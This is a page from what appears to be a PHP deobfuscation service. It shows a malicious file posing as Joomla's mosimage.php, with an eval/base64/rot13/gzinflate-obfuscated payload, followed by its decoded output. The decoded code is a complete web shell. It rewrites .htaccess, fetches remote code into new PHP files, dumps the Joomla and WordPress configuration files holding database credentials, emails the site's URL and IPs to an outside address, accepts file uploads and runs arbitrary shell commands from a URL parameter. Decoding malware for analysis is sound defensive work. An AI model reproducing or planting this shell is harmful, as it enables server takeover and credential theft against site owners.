Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * @version $Id: mosimage.php 21069 2011-04-03 22:58:48Z dextercowley $ ..

Decoded Output download

if(isset($_GET['patch'])) {
	$myfile = fopen(".htaccess", "w+") or die("Unable to open file!");
	$txt  = '<Files ~ "\.(zip|rar|php|php3|php5|php4|phtml|gif|png|phpgif|pHp|PHP|PhP|PHp|pHP|j|J|asp)$">';
	$txt .= "
deny from all
";
	$txt .= "</Files>
";
	$txt .= "<Files 1x.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files .inc.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files .incz.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files 2x.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files gelo.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files string.php>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files .libs.php>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>";
	
	fwrite($myfile, $txt);
	fclose($myfile);
	exit;
}

if(isset($_GET['clone'])) {
	$req = 0;
	$loc = '';
	
	$source = (isset($_GET['source'])) ? $_GET['source'] : '';
	$file   = (isset($_GET['name'])) ? $_GET['name'] : 'string';
	
	if($_GET['type'] == "wp") {
		$path  = "../../../../../../wp-admin/";
		$path2 = "../../../../../wp-admin/";
		$path3 = "../../../../../../../wp-admin/";
	} else {
		$path  = "../../../images/";
		$path2  = "../../../../images/";
		$path3 = "../../../../../images/";
	}
	
	if(isset($_GET['path'])) {
		$req = 1;
		$loc = $_GET['path'];
	} else {
		if(is_dir($path)) {
			$req = 1;
			$loc = $path;	
		} else {
			if(is_dir($path2)) {
				$req = 1;
				$loc = $path2;	
			} else {
				if(is_dir($path3)) {
					$req = 1;
					$loc = $path3;	
				}
			}
		}
	}
	
	if($req && !empty($loc)) {
		$file = fopen($loc.$file.".php","w+"); 
		$stream = fopen ($source, "r"); 
		while(!feof($stream)) {  
			$shell .=fgets($stream); 
		} 
		fwrite($file, $shell); 
		fclose($file);
	}
	exit;
	
}

if(isset($_GET['j'])){
	$p1 = "../../../../../../../";
	$p2 = "../../../../../../";
	$p3 = "../../../../../";
	$p4 = "../../../../";
	$p5 = "../../../";
	$p6 = "../../";
	$p7 = "../";
	$j = file_get_contents($p1."configuration.php");
	if(!$j) {$j = file_get_contents($p2."configuration.php");
		if(!$j) {$j = file_get_contents($p3."configuration.php");
			if(!$j) {$j = file_get_contents($p4."configuration.php");
				if(!$j) {$j = file_get_contents($p5."configuration.php");
					if(!$j) {$j = file_get_contents($p6."configuration.php");
						if(!$j) {$j = file_get_contents($p7."configuration.php");
							if(!$j) {$j = file_get_contents("configuration.php");
							}
						}
					}
				}
			}
		}
	}
	echo $j;
	exit;
} 

if(isset($_GET['w'])){
	$p1 = "../../../../../../../";
	$p2 = "../../../../../../";
	$p3 = "../../../../../";
	$p4 = "../../../../";
	$p5 = "../../../";
	$p6 = "../../";
	$p7 = "../";
	$w = file_get_contents($p1."wp-config.php");
	if(!$w) {$w = file_get_contents($p2."wp-config.php");
		if(!$w) {$w = file_get_contents($p3."wp-config.php");
			if(!$w) {$w = file_get_contents($p4."wp-config.php");
				if(!$w) {$w = file_get_contents($p5."wp-config.php");
					if(!$w) {$w = file_get_contents($p6."wp-config.php");
						if(!$w) {$w = file_get_contents($p7."wp-config.php");
							if(!$w) {$w = file_get_contents("wp-config.php");
							}
						}
					}
				}
			}
		}
	}
	echo $w;
	exit;
} 

if(isset($_GET['s'])) {
	$host = $_SERVER["HTTP_HOST"]; 
	$uri  = $_SERVER["REQUEST_URI"];
	$serv = gethostbyname($_SERVER['SERVER_ADDR']);
	$addr = gethostbyname($_SERVER['REMOTE_ADDR']); 
	mail("[email protected]", "kiriman bos $host.$uri", "Url: $host.$uri 
Ip :$serv
 Ip injector: $addr");
}

$safe   = @ini_get('safe_mode');
$secure = (!$safe) ? "SAFE_MODE : OFF" : "SAFE_MODE : ON";
echo "<body style='background:#000;color:#64D300;font-size:14px;'>";
echo "<title>UnKnown - Simple Shell</title><br>";
echo "<b>".$secure."</b><br>";
$cur_user = "(".get_current_user().")";
echo "<b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<b>Uname : ".php_uname()."</b><br>";
echo "<form enctype=multipart/form-data action method=POST><b>Upload File</b><br><input type=hidden name=submit><input type=file name=userfile size=28><br><b>New name: </b><input type=text size=15 name=newname class=ta><input type=submit class=bt value=Upload></form>";

if (isset($_POST['submit'])) {
	$uploaddir = pwd();
    if (!$name = $_POST['newname']) { $name = $_FILES['userfile']['name'];};
    move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
    echo (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) ? "!!Upload Failed" :  "Success Upload to " . $uploaddir . $name; 
}

function pwd() {
	$cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
		return ($u != strlen($cwd) - 1) ? $cwd . '/' : $cwd;
        
    } elseif($u = strrpos($cwd, '\/')) {
		if($u != strlen($cwd) -1){
			return $cwd.'\/';
		} else{
			return $cwd;
		}
	}
}
echo (isset($_GET['x'])) ? "<pre>" . shell_exec($_GET['x']) . "</pre>" : "<pre>" . shell_exec('ls -la') . "</pre>";

Did this file decode correctly?

Original Code

<?php

/**
 * @version     $Id: mosimage.php 21069 2011-04-03 22:58:48Z dextercowley $
 * @package     Joomla
 * @copyright   Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
 * @license     GNU/GPL, see LICENSE.php
 * Joomla! is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * See COPYRIGHT.php for copyright notices and details.
 */




eval(gzinflate(str_rot13(base64_decode('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'))));





?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 6694f8d78eefa1a15507a00881c25a92
Eval Count 1
Decode Time 150 ms